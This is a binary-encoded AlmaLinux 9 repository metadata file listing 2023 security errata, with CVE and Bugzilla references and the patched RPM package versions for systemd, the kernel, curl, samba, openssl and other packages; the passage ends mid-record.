update0��*�9https://access.redhat.com/errata/RHSA-2023:0953RHSA-2023:0953RHSA-2023:0953https://access.redhat.com/security/cve/CVE-2022-45061CVE-2022-45061CVE-2022-45061https://bugzilla.redhat.com/21440722144072https://errata.almalinux.org/9/ALSA-2023-0953.htmlALSA-2023:0953ALSA-2023:0953��python3-3.9.14-1.el9_1.2.x86_64.rpm-�python3-libs-3.9.14-1.el9_1.2.i686.rpm-�python3-libs-3.9.14-1.el9_1.2.x86_64.rpm��python3-3.9.14-1.el9_1.2.x86_64.rpm-�python3-libs-3.9.14-1.el9_1.2.i686.rpm-�python3-libs-3.9.14-1.el9_1.2.x86_64.rpm����I�a��VBBBBBBBBBBBBBBBBsecurityModerate: systemd security update0��c�]https://access.redhat.com/errata/RHSA-2023:0954RHSA-2023:0954RHSA-2023:0954https://access.redhat.com/security/cve/CVE-2022-4415CVE-2022-4415CVE-2022-4415https://access.redhat.com/security/cve/CVE-2022-45873CVE-2022-45873CVE-2022-45873https://bugzilla.redhat.com/21490632149063https://bugzilla.redhat.com/21555152155515https://errata.almalinux.org/9/ALSA-2023-0954.htmlALSA-2023:0954ALSA-2023:0954�_�systemd-libs-250-12.el9_1.3.x86_64.rpm�D�systemd-resolved-250-12.el9_1.3.x86_64.rpm�E�systemd-udev-250-12.el9_1.3.x86_64.rpm�]�systemd-250-12.el9_1.3.i686.rpm�B�systemd-oomd-250-12.el9_1.3.x86_64.rpm�^�systemd-container-250-12.el9_1.3.x86_64.rpm�]�systemd-250-12.el9_1.3.x86_64.rpm�_�systemd-libs-250-12.el9_1.3.i686.rpm�^�systemd-container-250-12.el9_1.3.i686.rpm�p�systemd-rpm-macros-250-12.el9_1.3.noarch.rpm�C�systemd-pam-250-12.el9_1.3.x86_64.rpm�_�systemd-libs-250-12.el9_1.3.x86_64.rpm�D�systemd-resolved-250-12.el9_1.3.x86_64.rpm�E�systemd-udev-250-12.el9_1.3.x86_64.rpm�]�systemd-250-12.el9_1.3.i686.rpm�B�systemd-oomd-250-12.el9_1.3.x86_64.rpm�^�systemd-container-250-12.el9_1.3.x86_64.rpm�]�systemd-250-12.el9_1.3.x86_64.rpm�_�systemd-libs-250-12.el9_1.3.i686.rpm�^�systemd-container-250-12.el9_1.3.i686.rpm�p�systemd-rpm-macros-250-12.el9_1.3.noarch.rpm�C�systemd-pam-250-12.el9_1.3.x86_64.rpm����|�b��hBsecurityModerate: lua security update0��@�8https://access.redhat.com/errata/RHSA-2023:0957RHSA-2023:0957RHSA-2023:0957https://access.redhat.com/security/cve/CVE-2021-43519CVE-2021-43519CVE-2021-43519https://access.redhat.com/security/cve/CVE-2021-44964CVE-2021-44964CVE-2021-44964https://bugzilla.redhat.com/20476722047672https://bugzilla.redhat.com/20647722064772https://errata.almalinux.org/9/ALSA-2023-0957.htmlALSA-2023:0957ALSA-2023:0957��!lua-libs-5.4.4-2.el9_1.x86_64.rpm��!lua-libs-5.4.4-2.el9_1.i686.rpm��!lua-libs-5.4.4-2.el9_1.x86_64.rpm��!lua-libs-5.4.4-2.el9_1.i686.rpm����b�c��kBsecurityModerate: vim security update0��x�ehttps://access.redhat.com/errata/RHSA-2023:0958RHSA-2023:0958RHSA-2023:0958https://access.redhat.com/security/cve/CVE-2022-47024CVE-2022-47024CVE-2022-47024https://bugzilla.redhat.com/21636132163613https://errata.almalinux.org/9/ALSA-2023-0958.htmlALSA-2023:0958ALSA-2023:0958�S�vim-minimal-8.2.2637-20.el9_1.x86_64.rpm�7�vim-filesystem-8.2.2637-20.el9_1.noarch.rpm�S�vim-minimal-8.2.2637-20.el9_1.x86_64.rpm�7�vim-filesystem-8.2.2637-20.el9_1.noarch.rpm����A�d�0�nsecurityModerate: tar security update0��]�https://access.redhat.com/errata/RHSA-2023:0959RHSA-2023:0959RHSA-2023:0959https://access.redhat.com/security/cve/CVE-2022-48303CVE-2022-48303CVE-2022-48303https://bugzilla.redhat.com/21497222149722https://errata.almalinux.org/9/ALSA-2023-0959.htmlALSA-2023:0959ALSA-2023:0959��'tar-1.34-6.el9_1.x86_64.rpm��'tar-1.34-6.el9_1.x86_64.rpm����r�e��qBsecurityModerate: gnutls security and bug fix update0��s�https://access.redhat.com/errata/RHSA-2023:1141RHSA-2023:1141RHSA-2023:1141https://access.redhat.com/security/cve/CVE-2023-0361CVE-2023-0361CVE-2023-0361https://bugzilla.redhat.com/21625962162596https://errata.almalinux.org/9/ALSA-2023-1141.htmlALSA-2023:1141ALSA-2023:1141�#�gnutls-3.7.6-18.el9_1.x86_64.rpm�#�gnutls-3.7.6-18.el9_1.i686.rpm�#�gnutls-3.7.6-18.el9_1.x86_64.rpm�#�gnutls-3.7.6-18.el9_1.i686.rpm�����f��tBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security, bug fix, and enhancement update0'���Yhttps://access.redhat.com/errata/RHSA-2023:1470RHSA-2023:1470RHSA-2023:1470https://access.redhat.com/security/cve/CVE-2022-4269CVE-2022-4269CVE-2022-4269https://access.redhat.com/security/cve/CVE-2022-4744CVE-2022-4744CVE-2022-4744https://access.redhat.com/security/cve/CVE-2023-0266CVE-2023-0266CVE-2023-0266https://bugzilla.redhat.com/21502722150272https://bugzilla.redhat.com/21563222156322https://bugzilla.redhat.com/21633792163379https://errata.almalinux.org/9/ALSA-2023-1470.htmlALSA-2023:1470ALSA-2023:1470
kernel-5.14.0-162.22.2.el9_1.x86_64.rpm1bpftool-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-core-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-modules-extra-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-modules-5.14.0-162.22.2.el9_1.x86_64.rpm2python3-perf-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-abi-stablelists-5.14.0-162.22.2.el9_1.noarch.rpmkernel-debug-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-tools-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-modules-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-core-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-tools-libs-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-modules-extra-5.14.0-162.22.2.el9_1.x86_64.rpm
kernel-5.14.0-162.22.2.el9_1.x86_64.rpm1bpftool-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-core-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-modules-extra-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-modules-5.14.0-162.22.2.el9_1.x86_64.rpm2python3-perf-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-abi-stablelists-5.14.0-162.22.2.el9_1.noarch.rpmkernel-debug-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-tools-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-modules-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-core-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-tools-libs-5.14.0-162.22.2.el9_1.x86_64.rpmkernel-debug-modules-extra-5.14.0-162.22.2.el9_1.x86_64.rpm����C�g��MBBBBBBBBsecurityModerate: curl security update0��k�9https://access.redhat.com/errata/RHSA-2023:1701RHSA-2023:1701RHSA-2023:1701https://access.redhat.com/security/cve/CVE-2023-23916CVE-2023-23916CVE-2023-23916https://bugzilla.redhat.com/21678152167815https://errata.almalinux.org/9/ALSA-2023-1701.htmlALSA-2023:1701ALSA-2023:1701{�Elibcurl-7.76.1-19.el9_1.2.x86_64.rpm{�Elibcurl-7.76.1-19.el9_1.2.i686.rpm|�Elibcurl-minimal-7.76.1-19.el9_1.2.i686.rpm�)�Ecurl-7.76.1-19.el9_1.2.x86_64.rpm|�Elibcurl-minimal-7.76.1-19.el9_1.2.x86_64.rpm�*�Ecurl-minimal-7.76.1-19.el9_1.2.x86_64.rpm{�Elibcurl-7.76.1-19.el9_1.2.x86_64.rpm{�Elibcurl-7.76.1-19.el9_1.2.i686.rpm|�Elibcurl-minimal-7.76.1-19.el9_1.2.i686.rpm�)�Ecurl-7.76.1-19.el9_1.2.x86_64.rpm|�Elibcurl-minimal-7.76.1-19.el9_1.2.x86_64.rpm�*�Ecurl-minimal-7.76.1-19.el9_1.2.x86_64.rpm�����h��WBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security and bug fix update0'��$�4https://access.redhat.com/errata/RHSA-2023:1703RHSA-2023:1703RHSA-2023:1703https://access.redhat.com/security/cve/CVE-2023-0386CVE-2023-0386CVE-2023-0386https://bugzilla.redhat.com/21595052159505https://errata.almalinux.org/9/ALSA-2023-1703.htmlALSA-2023:1703ALSA-2023:1703
1�bpftool-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-core-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-modules-extra-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-modules-extra-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-core-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-modules-5.14.0-162.23.1.el9_1.x86_64.rpm2�python3-perf-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-modules-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-tools-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-abi-stablelists-5.14.0-162.23.1.el9_1.noarch.rpm�kernel-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-tools-libs-5.14.0-162.23.1.el9_1.x86_64.rpm
1�bpftool-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-core-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-modules-extra-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-modules-extra-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-core-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-modules-5.14.0-162.23.1.el9_1.x86_64.rpm2�python3-perf-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-modules-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-debug-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-tools-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-abi-stablelists-5.14.0-162.23.1.el9_1.noarch.rpm�kernel-5.14.0-162.23.1.el9_1.x86_64.rpm�kernel-tools-libs-5.14.0-162.23.1.el9_1.x86_64.rpm�����i�	�pBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: samba security update0'��X�https://access.redhat.com/errata/RHSA-2023:2127RHSA-2023:2127RHSA-2023:2127https://access.redhat.com/security/cve/CVE-2022-38023CVE-2022-38023CVE-2022-38023https://bugzilla.redhat.com/21543622154362https://errata.almalinux.org/9/ALSA-2023-2127.htmlALSA-2023:2127ALSA-2023:2127�6>samba-winbind-modules-4.16.4-103.el9_1.i686.rpm�3>samba-client-libs-4.16.4-103.el9_1.x86_64.rpm�1>libwbclient-4.16.4-103.el9_1.x86_64.rpm�Y>samba-common-tools-4.16.4-103.el9_1.x86_64.rpm�6>samba-winbind-modules-4.16.4-103.el9_1.x86_64.rpm�5>samba-libs-4.16.4-103.el9_1.i686.rpm�0>libsmbclient-4.16.4-103.el9_1.x86_64.rpm�3>samba-client-libs-4.16.4-103.el9_1.i686.rpm�2>python3-samba-4.16.4-103.el9_1.i686.rpm�4>samba-common-libs-4.16.4-103.el9_1.i686.rpm�X>samba-4.16.4-103.el9_1.x86_64.rpm�2>python3-samba-4.16.4-103.el9_1.x86_64.rpm�5>samba-libs-4.16.4-103.el9_1.x86_64.rpm�4>samba-common-libs-4.16.4-103.el9_1.x86_64.rpm�1>libwbclient-4.16.4-103.el9_1.i686.rpm�u>samba-common-4.16.4-103.el9_1.noarch.rpm�0>libsmbclient-4.16.4-103.el9_1.i686.rpm�Z>samba-winbind-4.16.4-103.el9_1.x86_64.rpm�6>samba-winbind-modules-4.16.4-103.el9_1.i686.rpm�3>samba-client-libs-4.16.4-103.el9_1.x86_64.rpm�1>libwbclient-4.16.4-103.el9_1.x86_64.rpm�Y>samba-common-tools-4.16.4-103.el9_1.x86_64.rpm�6>samba-winbind-modules-4.16.4-103.el9_1.x86_64.rpm�5>samba-libs-4.16.4-103.el9_1.i686.rpm�0>libsmbclient-4.16.4-103.el9_1.x86_64.rpm�3>samba-client-libs-4.16.4-103.el9_1.i686.rpm�2>python3-samba-4.16.4-103.el9_1.i686.rpm�4>samba-common-libs-4.16.4-103.el9_1.i686.rpm�X>samba-4.16.4-103.el9_1.x86_64.rpm�2>python3-samba-4.16.4-103.el9_1.x86_64.rpm�5>samba-libs-4.16.4-103.el9_1.x86_64.rpm�4>samba-common-libs-4.16.4-103.el9_1.x86_64.rpm�1>libwbclient-4.16.4-103.el9_1.i686.rpm�u>samba-common-4.16.4-103.el9_1.noarch.rpm�0>libsmbclient-4.16.4-103.el9_1.i686.rpm�Z>samba-winbind-4.16.4-103.el9_1.x86_64.rpm��ӿ/�j�
�LBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security, bug fix, and enhancement update0'��l�SRhttps://access.redhat.com/errata/RHSA-2023:2458RHSA-2023:2458RHSA-2023:2458https://access.redhat.com/security/cve/CVE-2021-26341CVE-2021-26341CVE-2021-26341https://access.redhat.com/security/cve/CVE-2021-33655CVE-2021-33655CVE-2021-33655https://access.redhat.com/security/cve/CVE-2022-1462CVE-2022-1462CVE-2022-1462https://access.redhat.com/security/cve/CVE-2022-1789CVE-2022-1789CVE-2022-1789https://access.redhat.com/security/cve/CVE-2022-1882CVE-2022-1882CVE-2022-1882https://access.redhat.com/security/cve/CVE-2022-20141CVE-2022-20141CVE-2022-20141https://access.redhat.com/security/cve/CVE-2022-21505CVE-2022-21505CVE-2022-21505https://access.redhat.com/security/cve/CVE-2022-2196CVE-2022-2196CVE-2022-2196https://access.redhat.com/security/cve/CVE-2022-2663CVE-2022-2663CVE-2022-2663https://access.redhat.com/security/cve/CVE-2022-28388CVE-2022-28388CVE-2022-28388https://access.redhat.com/security/cve/CVE-2022-3028CVE-2022-3028CVE-2022-3028https://access.redhat.com/security/cve/CVE-2022-33743CVE-2022-33743CVE-2022-33743https://access.redhat.com/security/cve/CVE-2022-3435CVE-2022-3435CVE-2022-3435https://access.redhat.com/security/cve/CVE-2022-3522CVE-2022-3522CVE-2022-3522https://access.redhat.com/security/cve/CVE-2022-3524CVE-2022-3524CVE-2022-3524https://access.redhat.com/security/cve/CVE-2022-3566CVE-2022-3566CVE-2022-3566https://access.redhat.com/security/cve/CVE-2022-3567CVE-2022-3567CVE-2022-3567https://access.redhat.com/security/cve/CVE-2022-3619CVE-2022-3619CVE-2022-3619https://access.redhat.com/security/cve/CVE-2022-3623CVE-2022-3623CVE-2022-3623https://access.redhat.com/security/cve/CVE-2022-3625CVE-2022-3625CVE-2022-3625https://access.redhat.com/security/cve/CVE-2022-3628CVE-2022-3628CVE-2022-3628https://access.redhat.com/security/cve/CVE-2022-3640CVE-2022-3640CVE-2022-3640https://access.redhat.com/security/cve/CVE-2022-3707CVE-2022-3707CVE-2022-3707https://access.redhat.com/security/cve/CVE-2022-39188CVE-2022-39188CVE-2022-39188https://access.redhat.com/security/cve/CVE-2022-39189CVE-2022-39189CVE-2022-39189https://access.redhat.com/security/cve/CVE-2022-4128CVE-2022-4128CVE-2022-4128https://access.redhat.com/security/cve/CVE-2022-4129CVE-2022-4129CVE-2022-4129https://access.redhat.com/security/cve/CVE-2022-41674CVE-2022-41674CVE-2022-41674https://access.redhat.com/security/cve/CVE-2022-42703CVE-2022-42703CVE-2022-42703https://access.redhat.com/security/cve/CVE-2022-42720CVE-2022-42720CVE-2022-42720https://access.redhat.com/security/cve/CVE-2022-42721CVE-2022-42721CVE-2022-42721https://access.redhat.com/security/cve/CVE-2022-42722CVE-2022-42722CVE-2022-42722https://access.redhat.com/security/cve/CVE-2022-42896CVE-2022-42896CVE-2022-42896https://access.redhat.com/security/cve/CVE-2022-43750CVE-2022-43750CVE-2022-43750https://access.redhat.com/security/cve/CVE-2022-47929CVE-2022-47929CVE-2022-47929https://access.redhat.com/security/cve/CVE-2023-0394CVE-2023-0394CVE-2023-0394https://access.redhat.com/security/cve/CVE-2023-0461CVE-2023-0461CVE-2023-0461https://access.redhat.com/security/cve/CVE-2023-0590CVE-2023-0590CVE-2023-0590https://access.redhat.com/security/cve/CVE-2023-1195CVE-2023-1195CVE-2023-1195https://access.redhat.com/security/cve/CVE-2023-1382CVE-2023-1382CVE-2023-1382https://bugzilla.redhat.com/20617032061703https://bugzilla.redhat.com/20730912073091https://bugzilla.redhat.com/20784662078466https://bugzilla.redhat.com/20897012089701https://bugzilla.redhat.com/20907232090723https://bugzilla.redhat.com/21068302106830https://bugzilla.redhat.com/21079242107924https://bugzilla.redhat.com/21086912108691https://bugzilla.redhat.com/21149372114937https://bugzilla.redhat.com/21222282122228https://bugzilla.redhat.com/21230562123056https://bugzilla.redhat.com/21247882124788https://bugzilla.redhat.com/21301412130141https://bugzilla.redhat.com/21334832133483https://bugzilla.redhat.com/21334902133490https://bugzilla.redhat.com/21343772134377https://bugzilla.redhat.com/21343802134380https://bugzilla.redhat.com/21344512134451https://bugzilla.redhat.com/21345062134506https://bugzilla.redhat.com/21345172134517https://bugzilla.redhat.com/21345282134528https://bugzilla.redhat.com/21379792137979https://bugzilla.redhat.com/21396102139610https://bugzilla.redhat.com/21438932143893https://bugzilla.redhat.com/21439432143943https://bugzilla.redhat.com/21447202144720https://bugzilla.redhat.com/21473642147364https://bugzilla.redhat.com/21509472150947https://bugzilla.redhat.com/21509602150960https://bugzilla.redhat.com/21509792150979https://bugzilla.redhat.com/21512702151270https://bugzilla.redhat.com/21541712154171https://bugzilla.redhat.com/21542352154235https://bugzilla.redhat.com/21600232160023https://bugzilla.redhat.com/21621202162120https://bugzilla.redhat.com/21657212165721https://bugzilla.redhat.com/21657412165741https://bugzilla.redhat.com/21682462168246https://bugzilla.redhat.com/21761922176192https://bugzilla.redhat.com/21773712177371https://errata.almalinux.org/9/ALSA-2023-2458.htmlALSA-2023:2458ALSA-2023:2458?kernel-debug-modules-extra-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-tools-libs-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-tools-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-core-5.14.0-284.11.1.el9_2.x86_64.rpm"?kernel-uki-virt-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-modules-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-abi-stablelists-5.14.0-284.11.1.el9_2.noarch.rpm?kernel-modules-5.14.0-284.11.1.el9_2.x86_64.rpm!?kernel-modules-core-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-modules-extra-5.14.0-284.11.1.el9_2.x86_64.rpm1�9bpftool-7.0.0-284.11.1.el9_2.x86_64.rpm2?python3-perf-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-core-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-modules-core-5.14.0-284.11.1.el9_2.x86_64.rpm ?kernel-debug-uki-virt-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-modules-extra-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-tools-libs-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-tools-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-core-5.14.0-284.11.1.el9_2.x86_64.rpm"?kernel-uki-virt-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-modules-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-abi-stablelists-5.14.0-284.11.1.el9_2.noarch.rpm?kernel-modules-5.14.0-284.11.1.el9_2.x86_64.rpm!?kernel-modules-core-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-modules-extra-5.14.0-284.11.1.el9_2.x86_64.rpm1�9bpftool-7.0.0-284.11.1.el9_2.x86_64.rpm2?python3-perf-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-core-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-debug-modules-core-5.14.0-284.11.1.el9_2.x86_64.rpm ?kernel-debug-uki-virt-5.14.0-284.11.1.el9_2.x86_64.rpm?kernel-5.14.0-284.11.1.el9_2.x86_64.rpm����[�k�4�mBBBBBsecurityModerate: device-mapper-multipath security and bug fix update0��?�]https://access.redhat.com/errata/RHSA-2023:2459RHSA-2023:2459RHSA-2023:2459https://access.redhat.com/security/cve/CVE-2022-41973CVE-2022-41973CVE-2022-41973https://bugzilla.redhat.com/21238942123894https://errata.almalinux.org/9/ALSA-2023-2459.htmlALSA-2023:2459ALSA-2023:2459�o�~kpartx-0.8.7-20.el9.x86_64.rpm�Q�~device-mapper-multipath-0.8.7-20.el9.x86_64.rpm�(�~device-mapper-multipath-libs-0.8.7-20.el9.i686.rpm�(�~device-mapper-multipath-libs-0.8.7-20.el9.x86_64.rpm�o�~kpartx-0.8.7-20.el9.x86_64.rpm�Q�~device-mapper-multipath-0.8.7-20.el9.x86_64.rpm�(�~device-mapper-multipath-libs-0.8.7-20.el9.i686.rpm�(�~device-mapper-multipath-libs-0.8.7-20.el9.x86_64.rpm�����l��uBBBBBBBBsecurityLow: curl security update0�9���"https://access.redhat.com/errata/RHSA-2023:2478RHSA-2023:2478RHSA-2023:2478https://access.redhat.com/security/cve/CVE-2022-35252CVE-2022-35252CVE-2022-35252https://access.redhat.com/security/cve/CVE-2022-43552CVE-2022-43552CVE-2022-43552https://bugzilla.redhat.com/21207182120718https://bugzilla.redhat.com/21526522152652https://errata.almalinux.org/9/ALSA-2023-2478.htmlALSA-2023:2478ALSA-2023:2478{�Flibcurl-7.76.1-23.el9.i686.rpm�)�Fcurl-7.76.1-23.el9.x86_64.rpm|�Flibcurl-minimal-7.76.1-23.el9.i686.rpm{�Flibcurl-7.76.1-23.el9.x86_64.rpm|�Flibcurl-minimal-7.76.1-23.el9.x86_64.rpm�*�Fcurl-minimal-7.76.1-23.el9.x86_64.rpm{�Flibcurl-7.76.1-23.el9.i686.rpm�)�Fcurl-7.76.1-23.el9.x86_64.rpm|�Flibcurl-minimal-7.76.1-23.el9.i686.rpm{�Flibcurl-7.76.1-23.el9.x86_64.rpm|�Flibcurl-minimal-7.76.1-23.el9.x86_64.rpm�*�Fcurl-minimal-7.76.1-23.el9.x86_64.rpm����c�m��securityModerate: fwupd security and bug fix update0��>�M
https://access.redhat.com/errata/RHSA-2023:2487RHSA-2023:2487RHSA-2023:2487https://access.redhat.com/security/cve/CVE-2022-3287CVE-2022-3287CVE-2022-3287https://access.redhat.com/security/cve/CVE-2022-34301CVE-2022-34301CVE-2022-34301https://access.redhat.com/security/cve/CVE-2022-34302CVE-2022-34302CVE-2022-34302https://access.redhat.com/security/cve/CVE-2022-34303CVE-2022-34303CVE-2022-34303https://bugzilla.redhat.com/21206872120687https://bugzilla.redhat.com/21206992120699https://bugzilla.redhat.com/21207012120701https://bugzilla.redhat.com/21299042129904https://errata.almalinux.org/9/ALSA-2023-2487.htmlALSA-2023:2487ALSA-2023:2487�_�fwupd-1.8.10-2.el9.alma.x86_64.rpm�_�fwupd-1.8.10-2.el9.alma.x86_64.rpm����}�n��ABBBBBsecurityModerate: dhcp security and enhancement update0���Ahttps://access.redhat.com/errata/RHSA-2023:2502RHSA-2023:2502RHSA-2023:2502https://access.redhat.com/security/cve/CVE-2022-2928CVE-2022-2928CVE-2022-2928https://access.redhat.com/security/cve/CVE-2022-2929CVE-2022-2929CVE-2022-2929https://bugzilla.redhat.com/21320012132001https://bugzilla.redhat.com/21320022132002https://errata.almalinux.org/9/ALSA-2023-2502.htmlALSA-2023:2502ALSA-2023:2502�b�dhcp-common-4.4.2-18.b1.el9.noarch.rpm�a�dhcp-client-4.4.2-18.b1.el9.x86_64.rpm�c�dhcp-relay-4.4.2-18.b1.el9.x86_64.rpm�d�dhcp-server-4.4.2-18.b1.el9.x86_64.rpm�b�dhcp-common-4.4.2-18.b1.el9.noarch.rpm�a�dhcp-client-4.4.2-18.b1.el9.x86_64.rpm�c�dhcp-relay-4.4.2-18.b1.el9.x86_64.rpm�d�dhcp-server-4.4.2-18.b1.el9.x86_64.rpm�����o�
�IBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityLow: samba security, bug fix, and enhancement update0�9��L�https://access.redhat.com/errata/RHSA-2023:2519RHSA-2023:2519RHSA-2023:2519https://access.redhat.com/security/cve/CVE-2022-1615CVE-2022-1615CVE-2022-1615https://bugzilla.redhat.com/21226492122649https://errata.almalinux.org/9/ALSA-2023-2519.htmlALSA-2023:2519ALSA-2023:2519�[(samba-dc-libs-4.17.5-102.el9.i686.rpm�@(samba-tools-4.17.5-102.el9.x86_64.rpm�u(samba-common-4.17.5-102.el9.noarch.rpm�A(samba-usershares-4.17.5-102.el9.x86_64.rpm�1(libwbclient-4.17.5-102.el9.x86_64.rpm�0(libsmbclient-4.17.5-102.el9.i686.rpm�Y(samba-common-tools-4.17.5-102.el9.x86_64.rpm�3(samba-client-libs-4.17.5-102.el9.x86_64.rpm�5(samba-libs-4.17.5-102.el9.i686.rpm�>(samba-dcerpc-4.17.5-102.el9.x86_64.rpm�6(samba-winbind-modules-4.17.5-102.el9.x86_64.rpm�Y(libnetapi-4.17.5-102.el9.x86_64.rpm�<(python3-samba-dc-4.17.5-102.el9.x86_64.rpm�?(samba-ldb-ldap-modules-4.17.5-102.el9.x86_64.rpm�0(libsmbclient-4.17.5-102.el9.x86_64.rpm�4(samba-common-libs-4.17.5-102.el9.x86_64.rpm�1(libwbclient-4.17.5-102.el9.i686.rpm�3(samba-client-libs-4.17.5-102.el9.i686.rpm�Y(libnetapi-4.17.5-102.el9.i686.rpm�6(samba-winbind-modules-4.17.5-102.el9.i686.rpm�5(samba-libs-4.17.5-102.el9.x86_64.rpm�2(python3-samba-4.17.5-102.el9.i686.rpm�Z(samba-winbind-4.17.5-102.el9.x86_64.rpm�[(samba-dc-libs-4.17.5-102.el9.x86_64.rpm�X(samba-4.17.5-102.el9.x86_64.rpm�2(python3-samba-4.17.5-102.el9.x86_64.rpm�4(samba-common-libs-4.17.5-102.el9.i686.rpm�[(samba-dc-libs-4.17.5-102.el9.i686.rpm�@(samba-tools-4.17.5-102.el9.x86_64.rpm�u(samba-common-4.17.5-102.el9.noarch.rpm�A(samba-usershares-4.17.5-102.el9.x86_64.rpm�1(libwbclient-4.17.5-102.el9.x86_64.rpm�0(libsmbclient-4.17.5-102.el9.i686.rpm�Y(samba-common-tools-4.17.5-102.el9.x86_64.rpm�3(samba-client-libs-4.17.5-102.el9.x86_64.rpm�5(samba-libs-4.17.5-102.el9.i686.rpm�>(samba-dcerpc-4.17.5-102.el9.x86_64.rpm�6(samba-winbind-modules-4.17.5-102.el9.x86_64.rpm�Y(libnetapi-4.17.5-102.el9.x86_64.rpm�<(python3-samba-dc-4.17.5-102.el9.x86_64.rpm�?(samba-ldb-ldap-modules-4.17.5-102.el9.x86_64.rpm�0(libsmbclient-4.17.5-102.el9.x86_64.rpm�4(samba-common-libs-4.17.5-102.el9.x86_64.rpm�1(libwbclient-4.17.5-102.el9.i686.rpm�3(samba-client-libs-4.17.5-102.el9.i686.rpm�Y(libnetapi-4.17.5-102.el9.i686.rpm�6(samba-winbind-modules-4.17.5-102.el9.i686.rpm�5(samba-libs-4.17.5-102.el9.x86_64.rpm�2(python3-samba-4.17.5-102.el9.i686.rpm�Z(samba-winbind-4.17.5-102.el9.x86_64.rpm�[(samba-dc-libs-4.17.5-102.el9.x86_64.rpm�X(samba-4.17.5-102.el9.x86_64.rpm�2(python3-samba-4.17.5-102.el9.x86_64.rpm�4(samba-common-libs-4.17.5-102.el9.i686.rpm����l�p��uBBBsecurityLow: openssl security and bug fix update0�9��P�phttps://access.redhat.com/errata/RHSA-2023:2523RHSA-2023:2523RHSA-2023:2523https://access.redhat.com/security/cve/CVE-2022-3358CVE-2022-3358CVE-2022-3358https://bugzilla.redhat.com/21347402134740https://errata.almalinux.org/9/ALSA-2023-2523.htmlALSA-2023:2523ALSA-2023:2523��yopenssl-libs-3.0.7-6.el9_2.x86_64.rpm��yopenssl-libs-3.0.7-6.el9_2.i686.rpm�:�yopenssl-3.0.7-6.el9_2.x86_64.rpm��yopenssl-libs-3.0.7-6.el9_2.x86_64.rpm��yopenssl-libs-3.0.7-6.el9_2.i686.rpm�:�yopenssl-3.0.7-6.el9_2.x86_64.rpm����B�q��zBsecurityLow: libarchive security update0�9��@�Yhttps://access.redhat.com/errata/RHSA-2023:2532RHSA-2023:2532RHSA-2023:2532https://access.redhat.com/security/cve/CVE-2022-36227CVE-2022-36227CVE-2022-36227https://bugzilla.redhat.com/21449722144972https://errata.almalinux.org/9/ALSA-2023-2532.htmlALSA-2023:2532ALSA-2023:2532�.�libarchive-3.5.3-4.el9.i686.rpm�.�libarchive-3.5.3-4.el9.x86_64.rpm�.�libarchive-3.5.3-4.el9.i686.rpm�.�libarchive-3.5.3-4.el9.x86_64.rpm�����r��}BBBBBBBBBBBBBBBsecurityModerate: krb5 security, bug fix, and enhancement 